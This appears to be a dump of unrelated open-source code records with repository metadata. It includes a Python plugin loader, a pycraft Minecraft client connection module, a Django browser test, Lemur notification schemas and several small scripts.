## the file LICENSE included in the packaging of this file. Please review the
## following information to ensure the GNU General Public License version 3.0
## requirements will be met: http://www.gnu.org/copyleft/gpl.html.
##
## If you do not wish to use this file under the terms of the GPL version 3.0
## then you may purchase a commercial license. For more information contact
## [email protected].
##
## This file is provided AS IS with NO WARRANTY OF ANY KIND, INCLUDING THE
## WARRANTY OF DESIGN, MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE.
##
#############################################################################
from ..exceptions import WidgetPluginError
def load_plugin(plugin, plugin_globals, plugin_locals):
""" Load the given plugin (which is an open file). Return True if the
plugin was loaded, or False if it wanted to be ignored. Raise an exception
if there was an error.
"""
try:
exec(plugin.read(), plugin_globals, plugin_locals)
except ImportError:
return False
except Exception, e:
raise WidgetPluginError("%s: %s" % (e.__class__, str(e)))
return True
| [
"[email protected]"
] | |
2ad5e098cbfdc9aab82ed4a4c64b2957d0a8a24c | 56122577951c39e62571de3390613b67ea379e5c | /sample.py | e61bcc3108ef30cfa7907cd532deb3340c77ce97 | [] | no_license | nedbat/blank_prz | e29ac4b0945e805e276aa553a1bb3f1d46c53bdb | bd95bd503319c214ed00b4bbef3de7119af55c80 | refs/heads/master | 2023-06-22T04:05:40.399584 | 2020-01-25T22:46:29 | 2020-01-25T23:02:35 | 86,907,227 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 78 | py | def f(n):
print("Look!: {}".format(n))
if n > 0:
f(n-1)
f(4)
| [
"[email protected]"
] | |
8f3e69c784b486f684321c1493ffb4cb4592cacb | f1a6013a41ea5d49e034d1932991ef039e767e34 | /utils/pycraft/networking/connection.py | 3cdd151a106a80699845e57ca79f86954c8b7016 | [
"Apache-2.0"
] | permissive | Merrg1n/PCRC | a544c234ea1eea79bb6fb235cc610d14090d6a7f | 0af9f6d3a1f9f2e0b78b71241176968b0e5983af | refs/heads/master | 2023-01-24T01:16:57.956263 | 2020-06-18T09:10:11 | 2020-06-18T09:10:11 | 256,414,160 | 2 | 1 | Apache-2.0 | 2020-04-30T04:01:53 | 2020-04-17T05:54:22 | Python | UTF-8 | Python | false | false | 36,447 | py | from __future__ import print_function
import copy
import traceback
from collections import deque
from threading import RLock
import zlib
import threading
import socket
import timeit
import select
import sys
import json
import re
from future.utils import raise_
from .types import VarInt
from .packets import clientbound, serverbound
from . import packets
from . import encryption
from .. import SUPPORTED_PROTOCOL_VERSIONS, SUPPORTED_MINECRAFT_VERSIONS
from ..exceptions import (
VersionMismatch, LoginDisconnect, IgnorePacket, InvalidState
)
STATE_STATUS = 1
STATE_PLAYING = 2
class ConnectionContext(object):
"""A ConnectionContext encapsulates the static configuration parameters
shared by the Connection class with other classes, such as Packet.
Importantly, it can be used without knowing the interface of Connection.
"""
def __init__(self, **kwds):
self.protocol_version = kwds.get('protocol_version')
class _ConnectionOptions(object):
def __init__(self, address=None, port=None, compression_threshold=-1,
compression_enabled=False):
self.address = address
self.port = port
self.compression_threshold = compression_threshold
self.compression_enabled = compression_enabled
class Connection(object):
"""This class represents a connection to a minecraft
server, it handles everything from connecting, sending packets to
handling default network behaviour
"""
def __init__(
self,
address,
port=25565,
auth_token=None,
username=None,
initial_version=None,
allowed_versions=None,
handle_exception=None,
handle_exit=None,
recorder=None
):
"""Sets up an instance of this object to be able to connect to a
minecraft server.
The connect method needs to be called in order to actually begin
the connection
:param address: address of the server to connect to
:param port(int): port of the server to connect to
:param auth_token: :class:`pycraft.authentication.AuthenticationToken`
object. If None, no authentication is attempted and
the server is assumed to be running in offline mode.
:param username: Username string; only applicable in offline mode.
:param initial_version: A Minecraft version ID string or protocol
version number to use if the server's protocol
version cannot be determined. (Although it is
now somewhat inaccurate, this name is retained
for backward compatibility.)
:param allowed_versions: A set of versions, each being a Minecraft
version ID string or protocol version number,
restricting the versions that the client may
use in connecting to the server.
:param handle_exception: The final exception handler. This is triggered
when an exception occurs in the networking
thread that is not caught normally. After
any other user-registered exception handlers
are run, the final exception (which may be the
original exception or one raised by another
handler) is passed, regardless of whether or
not it was caught by another handler, to the
final handler, which may be a function obeying
the protocol of 'register_exception_handler';
the value 'None', meaning that if the
exception was otherwise uncaught, it is
re-raised from the networking thread after
closing the connection; or the value 'False',
meaning that the exception is never re-raised.
:param handle_exit: A function to be called when a connection to a
server terminates, not caused by an exception,
and not with the intention to automatically
reconnect. Exceptions raised from this function
will be handled by any matching exception handlers.
""" # NOQA
# This lock is re-entrant because it may be acquired in a re-entrant
# manner from within an outgoing packet listener
self._write_lock = RLock()
self.networking_thread = None
self.new_networking_thread = None
self.packet_listeners = []
self.early_packet_listeners = []
self.outgoing_packet_listeners = []
self.early_outgoing_packet_listeners = []
self._exception_handlers = []
self.running_networking_thread = 0
def proto_version(version):
if isinstance(version, str):
proto_version = SUPPORTED_MINECRAFT_VERSIONS.get(version)
elif isinstance(version, int):
proto_version = version
else:
proto_version = None
if proto_version not in SUPPORTED_PROTOCOL_VERSIONS:
raise ValueError('Unsupported version number: %r.' % version)
return proto_version
if allowed_versions is None:
self.allowed_proto_versions = set(SUPPORTED_PROTOCOL_VERSIONS)
else:
allowed_versions = set(map(proto_version, allowed_versions))
self.allowed_proto_versions = allowed_versions
if initial_version is None:
self.default_proto_version = max(self.allowed_proto_versions)
else:
self.default_proto_version = proto_version(initial_version)
self.context = ConnectionContext(
protocol_version=max(self.allowed_proto_versions))
self.options = _ConnectionOptions()
self.options.address = address
self.options.port = port
self.auth_token = auth_token
self.username = username
self.recorder = recorder
self.connected = False
self.handle_exception = handle_exception
self.exception, self.exc_info = None, None
self.handle_exit = handle_exit
# The reactor handles all the default responses to packets,
# it should be changed per networking state
self.reactor = PacketReactor(self)
def _start_network_thread(self):
with self._write_lock:
if self.networking_thread is not None and \
not self.networking_thread.interrupt or \
self.new_networking_thread is not None:
raise InvalidState('A networking thread is already running.')
elif self.networking_thread is None:
self.networking_thread = NetworkingThread(self)
self.networking_thread.start()
else:
# This thread will wait until the existing thread exits, and
# then set 'networking_thread' to itself and
# 'new_networking_thread' to None.
self.new_networking_thread \
= NetworkingThread(self, previous=self.networking_thread)
self.new_networking_thread.start()
def write_packet(self, packet, force=False):
"""Writes a packet to the server.
If force is set to true, the method attempts to acquire the write lock
and write the packet out immediately, and as such may block.
If force is false then the packet will be added to the end of the
packet writing queue to be sent 'as soon as possible'
:param packet: The :class:`network.packets.Packet` to write
:param force(bool): Specifies if the packet write should be immediate
"""
packet.context = self.context
if force:
with self._write_lock:
self._write_packet(packet)
else:
self._outgoing_packet_queue.append(packet)
def listener(self, *packet_types, **kwds):
"""
Shorthand decorator to register a function as a packet listener.
"""
def listener_decorator(handler_func):
self.register_packet_listener(handler_func, *packet_types, **kwds)
return handler_func
return listener_decorator
def exception_handler(self, *exc_types, **kwds):
"""
Shorthand decorator to register a function as an exception handler.
"""
def exception_handler_decorator(handler_func):
self.register_exception_handler(handler_func, *exc_types, **kwds)
return handler_func
return exception_handler_decorator
def register_packet_listener(self, method, *packet_types, **kwds):
"""
Registers a listener method which will be notified when a packet of
a selected type is received.
If :class:`pycraft.networking.connection.IgnorePacket` is raised from
within this method, no subsequent handlers will be called. If
'early=True', this has the additional effect of preventing the default
in-built action; this could break the internal state of the
'Connection', so should be done with care. If, in addition,
'outgoing=True', this will prevent the packet from being written to the
network.
:param method: The method which will be called back with the packet
:param packet_types: The packets to listen for
:param outgoing: If 'True', this listener will be called on outgoing
packets just after they are sent to the server, rather
than on incoming packets.
:param early: If 'True', this listener will be called before any
built-in default action is carried out, and before any
listeners with 'early=False' are called. If
'outgoing=True', the listener will be called before the
packet is written to the network, rather than afterwards.
"""
outgoing = kwds.pop('outgoing', False)
early = kwds.pop('early', False)
target = self.packet_listeners if not early and not outgoing \
else self.early_packet_listeners if early and not outgoing \
else self.outgoing_packet_listeners if not early \
else self.early_outgoing_packet_listeners
target.append(packets.PacketListener(method, *packet_types, **kwds))
def register_exception_handler(self, handler_func, *exc_types, **kwds):
"""
Register a function to be called when an unhandled exception occurs
in the networking thread.
When multiple exception handlers are registered, they act like 'except'
clauses in a Python 'try' clause, with the earliest matching handler
catching the exception, and any later handlers catching any uncaught
exception raised from within an earlier handler.
Regardless of the presence or absence of matching handlers, any such
exception will cause the connection and the networking thread to
terminate, the final exception handler will be called (see the
'handle_exception' argument of the 'Connection' contructor), and the
original exception - or the last exception raised by a handler - will
be set as the 'exception' and 'exc_info' attributes of the
'Connection'.
:param handler_func: A function taking two arguments: the exception
object 'e' as in 'except Exception as e:', and the corresponding
3-tuple given by 'sys.exc_info()'. The return value of the function is
ignored, but any exception raised in it replaces the original
exception, and may be passed to later exception handlers.
:param exc_types: The types of exceptions that this handler shall
catch, as in 'except (exc_type_1, exc_type_2, ...) as e:'. If this is
empty, the handler will catch all exceptions.
:param early: If 'True', the exception handler is registered before
any existing exception handlers in the handling order.
"""
early = kwds.pop('early', False)
assert not kwds, 'Unexpected keyword arguments: %r' % (kwds,)
if early:
self._exception_handlers.insert(0, (handler_func, exc_types))
else:
self._exception_handlers.append((handler_func, exc_types))
def _pop_packet(self):
# Pops the topmost packet off the outgoing queue and writes it out
# through the socket
#
        # Mostly an internal convenience function; the caller should make
        # sure they have acquired the write lock, to avoid issues caused by
        # asynchronous access to the socket.
        # This should be the only method that removes elements from the
        # outbound queue.
if len(self._outgoing_packet_queue) == 0:
return False
else:
self._write_packet(self._outgoing_packet_queue.popleft())
return True
def _write_packet(self, packet):
# Immediately writes the given packet to the network. The caller must
# have the write lock acquired before calling this method.
try:
for listener in self.early_outgoing_packet_listeners:
listener.call_packet(packet)
if self.options.compression_enabled:
packet.write(self.socket, self.options.compression_threshold)
else:
packet.write(self.socket)
for listener in self.outgoing_packet_listeners:
listener.call_packet(packet)
except IgnorePacket:
pass
def status(self, handle_status=None, handle_ping=False):
"""Issue a status request to the server and then disconnect.
:param handle_status: a function to be called with the status
dictionary None for the default behaviour of
printing the dictionary to standard output, or
False to ignore the result.
:param handle_ping: a function to be called with the measured latency
in milliseconds, None for the default handler,
which prints the latency to standard outout, or
False, to prevent measurement of the latency.
"""
with self._write_lock: # pylint: disable=not-context-manager
self._check_connection()
self._connect()
self._handshake(next_state=STATE_STATUS)
self._start_network_thread()
do_ping = handle_ping is not False
self.reactor = StatusReactor(self, do_ping=do_ping)
if handle_status is False:
self.reactor.handle_status = lambda *args, **kwds: None
elif handle_status is not None:
self.reactor.handle_status = handle_status
if handle_ping is False:
self.reactor.handle_ping = lambda *args, **kwds: None
elif handle_ping is not None:
self.reactor.handle_ping = handle_ping
request_packet = serverbound.status.RequestPacket()
self.write_packet(request_packet)
def connect(self):
"""
Attempt to begin connecting to the server.
May safely be called multiple times after the first, i.e. to reconnect.
"""
# Hold the lock throughout, in case connect() is called from the
# networking thread while another connection is in progress.
with self._write_lock: # pylint: disable=not-context-manager
self._check_connection()
# It is important that this is set correctly even when connecting
# in status mode, as some servers, e.g. SpigotMC with the
# ProtocolSupport plugin, use it to determine the correct response.
# PCRC modified the value to default_proto_version
self.context.protocol_version = self.default_proto_version
self.spawned = False
self._connect()
if len(self.allowed_proto_versions) == 1:
# There is exactly one allowed protocol version, so skip the
# process of determining the server's version, and immediately
# connect.
self._handshake(next_state=STATE_PLAYING)
login_start_packet = serverbound.login.LoginStartPacket()
if self.auth_token:
login_start_packet.name = self.auth_token.profile.name
else:
login_start_packet.name = self.username
self.write_packet(login_start_packet)
self.reactor = LoginReactor(self)
self.recorder.on_protocol_version_decided(self.allowed_proto_versions.copy().pop())
else:
# Determine the server's protocol version by first performing a
# status query.
self._handshake(next_state=STATE_STATUS)
self.write_packet(serverbound.status.RequestPacket())
self.reactor = PlayingStatusReactor(self)
self._start_network_thread()
def check_connection(self):
return self._check_connection()
def _check_connection(self):
if self.networking_thread is not None and \
not self.networking_thread.interrupt or \
self.new_networking_thread is not None:
raise InvalidState('There is an existing connection.')
def _connect(self):
# Connect a socket to the server and create a file object from the
# socket.
# The file object is used to read any and all data from the socket
# since it's "guaranteed" to read the number of bytes specified,
# the socket itself will mostly be used to write data upstream to
# the server.
self._outgoing_packet_queue = deque()
info = socket.getaddrinfo(self.options.address, self.options.port,
0, socket.SOCK_STREAM)
# Prefer to use IPv4 (for backward compatibility with previous
# versions that always resolved hostnames to IPv4 addresses),
# then IPv6, then other address families.
def key(ai):
return 0 if ai[0] == socket.AF_INET else \
1 if ai[0] == socket.AF_INET6 else 2
ai_faml, ai_type, ai_prot, _ai_cnam, ai_addr = min(info, key=key)
self.socket = socket.socket(ai_faml, ai_type, ai_prot)
self.socket.connect(ai_addr)
self.file_object = self.socket.makefile("rb", 0)
self.options.compression_enabled = False
self.options.compression_threshold = -1
self.connected = True
def disconnect(self, immediate=False):
"""Terminate the existing server connection, if there is one.
If 'immediate' is True, do not attempt to write any packets.
"""
with self._write_lock: # pylint: disable=not-context-manager
self.connected = False
if not immediate and self.socket is not None:
# Flush any packets remaining in the queue.
while self._pop_packet():
pass
if self.networking_thread is not None:
self.networking_thread.interrupt = True
if self.socket is not None:
try:
self.socket.shutdown(socket.SHUT_RDWR)
except socket.error:
pass
finally:
self.socket.close()
self.socket = None
def _handshake(self, next_state=STATE_PLAYING):
handshake = serverbound.handshake.HandShakePacket()
handshake.protocol_version = self.context.protocol_version
handshake.server_address = self.options.address
handshake.server_port = self.options.port
handshake.next_state = next_state
self.write_packet(handshake)
def _handle_exception(self, exc, exc_info):
# Call the current PacketReactor's exception handler.
try:
if self.reactor.handle_exception(exc, exc_info):
return
except Exception as new_exc:
exc, exc_info = new_exc, sys.exc_info()
# Call the user-registered exception handlers in order.
for handler, exc_types in self._exception_handlers:
if not exc_types or isinstance(exc, exc_types):
try:
handler(exc, exc_info)
caught = True
break
except Exception as new_exc:
exc, exc_info = new_exc, sys.exc_info()
else:
caught = False
# Call the user-specified final exception handler.
if self.handle_exception not in (None, False):
try:
self.handle_exception(exc, exc_info)
except Exception as new_exc:
exc, exc_info = new_exc, sys.exc_info()
# For backward compatibility, try to set the 'exc_info' attribute.
try:
exc.exc_info = exc_info
except (TypeError, AttributeError):
pass
# Record the exception and cleanly terminate the connection.
self.exception, self.exc_info = exc, exc_info
self.disconnect(immediate=True)
# If allowed by the final exception handler, re-raise the exception.
if self.handle_exception is None and not caught:
raise_(*exc_info)
def _version_mismatch(self, server_protocol=None, server_version=None):
if server_protocol is None:
server_protocol = SUPPORTED_MINECRAFT_VERSIONS.get(server_version)
if server_protocol is None:
vs = 'version' if server_version is None else \
('version of %s' % server_version)
else:
vs = ('protocol version of %d' % server_protocol) + \
('' if server_version is None else ' (%s)' % server_version)
ss = 'supported, but not allowed for this connection' \
if server_protocol in SUPPORTED_PROTOCOL_VERSIONS \
else 'not supported'
raise VersionMismatch("Server's %s is %s." % (vs, ss))
def _handle_exit(self):
if not self.connected and self.handle_exit is not None:
self.handle_exit()
def _react(self, packet):
try:
for listener in self.early_packet_listeners:
listener.call_packet(packet)
self.reactor.react(packet)
for listener in self.packet_listeners:
listener.call_packet(packet)
except IgnorePacket:
pass
class NetworkingThread(threading.Thread):
def __init__(self, connection, previous=None):
threading.Thread.__init__(self)
self.interrupt = False
self.connection = connection
self.name = "Networking Thread"
self.daemon = True
self.previous_thread = previous
def run(self):
self.connection.running_networking_thread += 1
try:
if self.previous_thread is not None:
if self.previous_thread.is_alive():
self.previous_thread.join()
with self.connection._write_lock:
self.connection.networking_thread = self
self.connection.new_networking_thread = None
self._run()
self.connection._handle_exit()
except Exception as e:
self.interrupt = True
self.connection._handle_exception(e, sys.exc_info())
finally:
with self.connection._write_lock:
self.connection.networking_thread = None
self.connection.running_networking_thread -= 1
def _run(self):
while not self.interrupt:
# Attempt to write out as many as 300 packets.
num_packets = 0
with self.connection._write_lock:
try:
while not self.interrupt and self.connection._pop_packet():
num_packets += 1
if num_packets >= 300:
break
exc_info = None
except IOError:
exc_info = sys.exc_info()
# If any packets remain to be written, resume writing as soon
# as possible after reading any available packets; otherwise,
# wait for up to 50ms (1 tick) for new packets to arrive.
if self.connection._outgoing_packet_queue:
read_timeout = 0
else:
read_timeout = 0.05
# Read and react to as many as 500 packets.
while num_packets < 500 and not self.interrupt:
packet = self.connection.reactor.read_packet(
self.connection.file_object, timeout=read_timeout)
if not packet:
break
num_packets += 1
self.connection._react(packet)
read_timeout = 0
# Ignore the earlier exception if a disconnect packet is
# received, as it may have been caused by trying to write to
# the closed socket, which does not represent a program error.
if exc_info is not None and packet.packet_name == "disconnect":
exc_info = None
if exc_info is not None:
raise_(*exc_info)
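# Wire framing handled by PacketReactor.read_packet below: every packet is
# prefixed with a VarInt length; when compression is enabled the body starts
# with a VarInt decompressed size (0 meaning "sent uncompressed"), followed
# by the VarInt packet id and the packet fields.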
class PacketReactor(object):
"""
Reads and reacts to packets
"""
state_name = None
# Handshaking is considered the "default" state
get_clientbound_packets = staticmethod(clientbound.handshake.get_packets)
def __init__(self, connection):
self.connection = connection
context = self.connection.context
self.clientbound_packets = {
packet.get_id(context): packet
for packet in self.__class__.get_clientbound_packets(context)}
def read_packet(self, stream, timeout=0):
# Block for up to `timeout' seconds waiting for `stream' to become
# readable, returning `None' if the timeout elapses.
ready_to_read = select.select([stream], [], [], timeout)[0]
if ready_to_read:
length = VarInt.read(stream)
packet_data = packets.PacketBuffer()
packet_data.send(stream.read(length))
# Ensure we read all the packet
while len(packet_data.get_writable()) < length:
packet_data.send(
stream.read(length - len(packet_data.get_writable())))
packet_data.reset_cursor()
if self.connection.options.compression_enabled:
decompressed_size = VarInt.read(packet_data)
if decompressed_size > 0:
decompressor = zlib.decompressobj()
decompressed_packet = decompressor.decompress(
packet_data.read())
assert len(decompressed_packet) == decompressed_size, \
'decompressed length %d, but expected %d' % \
(len(decompressed_packet), decompressed_size)
packet_data.reset()
packet_data.send(decompressed_packet)
packet_data.reset_cursor()
packet_raw = copy.deepcopy(packet_data.bytes.getvalue())
packet_id = VarInt.read(packet_data)
# If we know the structure of the packet, attempt to parse it
# otherwise just skip it
if packet_id in self.clientbound_packets:
packet = self.clientbound_packets[packet_id]()
packet.context = self.connection.context
packet.read(packet_data)
else:
packet = packets.Packet(context=self.connection.context)
packet.data = packet_raw
return packet
else:
return None
def react(self, packet):
"""Called with each incoming packet after early packet listeners are
run (if none of them raise 'IgnorePacket'), but before regular
packet listeners are run. If this method raises 'IgnorePacket', no
subsequent packet listeners will be called for this packet.
"""
raise NotImplementedError("Call to base reactor")
def handle_exception(self, exc, exc_info):
"""Called when an exception is raised in the networking thread. If this
method returns True, the default action will be prevented and the
exception ignored (but the networking thread will still terminate).
"""
return False
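# Login flow handled below: the server's "encryption request" carries a
# public key and verify token; the client generates a shared AES secret,
# returns it RSA-encrypted, then wraps the socket and file object so that
# all subsequent traffic is encrypted.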
class LoginReactor(PacketReactor):
get_clientbound_packets = staticmethod(clientbound.login.get_packets)
def react(self, packet):
if packet.packet_name == "encryption request":
secret = encryption.generate_shared_secret()
token, encrypted_secret = encryption.encrypt_token_and_secret(
packet.public_key, packet.verify_token, secret)
# A server id of '-' means the server is in offline mode
if packet.server_id != '-':
server_id = encryption.generate_verification_hash(
packet.server_id, secret, packet.public_key)
if self.connection.auth_token is not None:
self.connection.auth_token.join(server_id)
encryption_response = serverbound.login.EncryptionResponsePacket()
encryption_response.shared_secret = encrypted_secret
encryption_response.verify_token = token
# Forced because we'll have encrypted the connection by the time
# it reaches the outgoing queue
self.connection.write_packet(encryption_response, force=True)
# Enable the encryption
cipher = encryption.create_AES_cipher(secret)
encryptor = cipher.encryptor()
decryptor = cipher.decryptor()
self.connection.socket = encryption.EncryptedSocketWrapper(
self.connection.socket, encryptor, decryptor)
self.connection.file_object = \
encryption.EncryptedFileObjectWrapper(
self.connection.file_object, decryptor)
elif packet.packet_name == "disconnect":
# Receiving a disconnect packet in the login state indicates an
# abnormal condition. Raise an exception explaining the situation.
try:
msg = json.loads(packet.json_data)['text']
except (ValueError, TypeError, KeyError):
msg = packet.json_data
match = re.match(r"Outdated (client! Please use|server!"
r" I'm still on) (?P<ver>\S+)$", msg)
if match:
ver = match.group('ver')
self.connection._version_mismatch(server_version=ver)
raise LoginDisconnect('The server rejected our login attempt '
'with: "%s".' % msg)
elif packet.packet_name == "login success":
self.connection.reactor = PlayingReactor(self.connection)
self.connection.recorder.start_recording()
elif packet.packet_name == "set compression":
self.connection.options.compression_threshold = packet.threshold
self.connection.options.compression_enabled = True
elif packet.packet_name == "login plugin request":
self.connection.write_packet(
serverbound.login.PluginResponsePacket(
message_id=packet.message_id, successful=False))
class PlayingReactor(PacketReactor):
get_clientbound_packets = staticmethod(clientbound.play.get_packets)
def react(self, packet):
if packet.packet_name == "set compression":
self.connection.options.compression_threshold = packet.threshold
self.connection.options.compression_enabled = True
elif packet.packet_name == "keep alive":
keep_alive_packet = serverbound.play.KeepAlivePacket()
keep_alive_packet.keep_alive_id = packet.keep_alive_id
self.connection.write_packet(keep_alive_packet)
elif packet.packet_name == "player position and look":
if self.connection.context.protocol_version >= 107:
teleport_confirm = serverbound.play.TeleportConfirmPacket()
teleport_confirm.teleport_id = packet.teleport_id
self.connection.write_packet(teleport_confirm)
            # PCRC: removed the original 'else' so the position response is always sent
position_response = serverbound.play.PositionAndLookPacket()
position_response.x = packet.x
position_response.feet_y = packet.y
position_response.z = packet.z
position_response.yaw = packet.yaw
position_response.pitch = packet.pitch
position_response.on_ground = True
self.connection.write_packet(position_response)
self.connection.spawned = True
elif packet.packet_name == "disconnect":
self.connection.disconnect()
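# Status flow handled below: after the "response" packet, an optional "ping"
# round trip is timed with timeit.default_timer() to estimate the latency in
# milliseconds.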
class StatusReactor(PacketReactor):
get_clientbound_packets = staticmethod(clientbound.status.get_packets)
def __init__(self, connection, do_ping=False):
super(StatusReactor, self).__init__(connection)
self.do_ping = do_ping
def react(self, packet):
if packet.packet_name == "response":
status_dict = json.loads(packet.json_response)
if self.do_ping:
ping_packet = serverbound.status.PingPacket()
# NOTE: it may be better to depend on the `monotonic' package
# or something similar for more accurate time measurement.
ping_packet.time = int(1000 * timeit.default_timer())
self.connection.write_packet(ping_packet)
else:
self.connection.disconnect()
self.handle_status(status_dict)
elif packet.packet_name == "ping":
if self.do_ping:
now = int(1000 * timeit.default_timer())
self.connection.disconnect()
self.handle_ping(now - packet.time)
def handle_status(self, status_dict):
print(status_dict)
def handle_ping(self, latency_ms):
print('Ping: %d ms' % latency_ms)
class PlayingStatusReactor(StatusReactor):
def __init__(self, connection):
super(PlayingStatusReactor, self).__init__(connection, do_ping=False)
def handle_status(self, status):
if status == {}:
# This can occur when we connect to a Mojang server while it is
# still initialising, so it must not cause the client to connect
# with the default version.
raise IOError('Invalid server status.')
elif 'version' not in status or 'protocol' not in status['version']:
return self.handle_failure()
proto = status['version']['protocol']
if proto not in self.connection.allowed_proto_versions:
self.connection._version_mismatch(
server_protocol=proto,
server_version=status['version'].get('name'))
self.handle_proto_version(proto)
def handle_proto_version(self, proto_version):
self.connection.allowed_proto_versions = {proto_version}
self.connection.connect()
def handle_failure(self):
self.handle_proto_version(self.connection.default_proto_version)
def handle_exception(self, exc, exc_info):
if isinstance(exc, EOFError):
# An exception of this type may indicate that the server does not
# properly support status queries, so we treat it as non-fatal.
self.connection.disconnect(immediate=True)
self.handle_failure()
return True
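

# Usage sketch (added for illustration; not part of the original module).
# The reactors above are driven by a Connection object from this package's
# connection module. The constructor and method signatures shown here are
# assumptions based on typical pyCraft usage, not guarantees:
#
#     conn = Connection('localhost', 25565, username='probe')
#     conn.connect()   # LoginReactor handles login, then PlayingReactor
#
#     # Query server status instead of logging in; this path goes through
#     # StatusReactor (with do_ping=True it also measures latency):
#     conn.status(handle_status=print, handle_ping=print)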
# === src/reviews/tests/test_js.py (repo: andyjia/phase, license: MIT) ===
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import os
from django.contrib.contenttypes.models import ContentType
from casper.tests import CasperTestCase
from accounts.factories import UserFactory
from categories.factories import CategoryFactory
from documents.factories import DocumentFactory
from default_documents.models import ContractorDeliverable
from default_documents.factories import (
ContractorDeliverableFactory, ContractorDeliverableRevisionFactory)
from reviews.factories import DistributionListFactory


class DistributionListWidgetTests(CasperTestCase):
def setUp(self):
Model = ContentType.objects.get_for_model(ContractorDeliverable)
self.category = CategoryFactory(
category_template__metadata_model=Model)
self.user = UserFactory(
email='[email protected]',
password='pass',
is_superuser=True,
category=self.category)
self.client.login(email=self.user.email, password='pass')
self.doc = DocumentFactory(
category=self.category,
metadata_factory_class=ContractorDeliverableFactory,
revision_factory_class=ContractorDeliverableRevisionFactory,
)
url = self.doc.get_edit_url()
self.url = '%s%s' % (self.live_server_url, url)
self.test_file = os.path.join(
os.path.dirname(__file__),
'casper_tests',
'tests.js'
)

    def test_select_distribution_list(self):
dl = DistributionListFactory(
categories=[self.category],
name='Team Cassoulet',
)
DistributionListFactory(
categories=[self.category],
name='Team Oui Oui et ses potes')
self.assertTrue(self.casper(
self.test_file,
url=self.url,
leader_id=dl.leader_id,
approver_id=dl.approver_id,
))
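
# Note (assumption, not from the original file): CasperTestCase boots a live
# test server and runs the JavaScript assertions in casper_tests/tests.js
# against it, so a typical invocation would be something like:
#
#     python manage.py test reviews.tests.test_js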
# === python/python_16487.py (repo: AK-1121/code_extraction, no license) ===
# Django: Why is timezone.now() off by one day?
# timezone.now() returns an aware datetime in UTC (tzinfo=<UTC>), so the date
# can appear one day off until the value is converted to the local time zone.
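# A minimal sketch of the usual fix (assumes a Django project with
# USE_TZ = True; the variable names are illustrative):
#
#     from django.utils import timezone
#
#     now_utc = timezone.now()                 # aware datetime, tzinfo=<UTC>
#     now_local = timezone.localtime(now_utc)  # convert before calling .date()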
# === Code/CodeRecords/2725/60697/271503.py (repo: AdamZhouSE/pythonHomework, no license) ===
t = int(input())
nums = []
for i in range(t):
    nums.append(int(input()))
for i in range(t):
    # Print "1" for an even value and "0" for an odd one.
    if nums[i] % 2 == 0:
        print("1")
    else:
        print("0")
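
# Worked example (input format inferred from the code): for the input
#
#     3
#     4
#     7
#     10
#
# the program reads t = 3 values and prints 1, 0, 1 on separate lines,
# since 4 and 10 are even and 7 is odd.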
"[email protected]"
] | |
186b9b7fb9c2f35bc5d4cea69b7abd64c1d13e2d | c7d5950b281e4f8063f21de151775c648664f03a | /lemur/notifications/schemas.py | 2c93d32b615ef7e246e6fec1d1b703ed1948ecf0 | [
"Apache-2.0"
] | permissive | mik373/lemur | b5cc6655cb2e361d99e175f668efb87592009cd0 | 121b72307ec101e84b9cc4090cfa3223806a5517 | refs/heads/master | 2021-01-18T15:01:32.709233 | 2016-06-14T00:22:45 | 2016-06-14T16:20:18 | 57,319,811 | 0 | 1 | null | 2016-04-28T17:03:25 | 2016-04-28T17:03:23 | Python | UTF-8 | Python | false | false | 1,707 | py | """
.. module: lemur.notifications.schemas
:platform: unix
:copyright: (c) 2015 by Netflix Inc., see AUTHORS for more
:license: Apache, see LICENSE for more details.
.. moduleauthor:: Kevin Glisson <[email protected]>
"""
from marshmallow import fields, post_dump
from lemur.common.schema import LemurInputSchema, LemurOutputSchema
from lemur.schemas import PluginInputSchema, PluginOutputSchema, AssociatedCertificateSchema


class NotificationInputSchema(LemurInputSchema):
id = fields.Integer()
label = fields.String(required=True)
description = fields.String()
active = fields.Boolean()
plugin = fields.Nested(PluginInputSchema, required=True)
certificates = fields.Nested(AssociatedCertificateSchema, many=True, missing=[])


class NotificationOutputSchema(LemurOutputSchema):
id = fields.Integer()
label = fields.String()
description = fields.String()
active = fields.Boolean()
options = fields.List(fields.Dict())
plugin = fields.Nested(PluginOutputSchema)
certificates = fields.Nested(AssociatedCertificateSchema, many=True, missing=[])

    @post_dump
def fill_object(self, data):
data['plugin']['pluginOptions'] = data['options']
return data


class NotificationNestedOutputSchema(LemurOutputSchema):
__envelope__ = False
id = fields.Integer()
label = fields.String()
description = fields.String()
active = fields.Boolean()
options = fields.List(fields.Dict())
plugin = fields.Nested(PluginOutputSchema)


notification_input_schema = NotificationInputSchema()
notification_output_schema = NotificationOutputSchema()
notifications_output_schema = NotificationOutputSchema(many=True)
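
# Usage sketch (hypothetical payload, not part of this module): validating an
# incoming request body with the input schema. The call shape assumes the
# marshmallow 2.x API that Lemur's schemas are built on:
#
#     data, errors = notification_input_schema.load({
#         'label': 'expiry-30d',
#         'plugin': {'slug': 'email-notification'},
#         'certificates': [],
#     })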
# === src/players/__init__.py (repo: pawelad/nba-rank, license: MIT) ===
default_app_config = 'players.apps.PlayersAppConfig'
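
# For context (assumption about the companion module): the string above names
# an AppConfig subclass that would conventionally live in players/apps.py:
#
#     from django.apps import AppConfig
#
#     class PlayersAppConfig(AppConfig):
#         name = 'players'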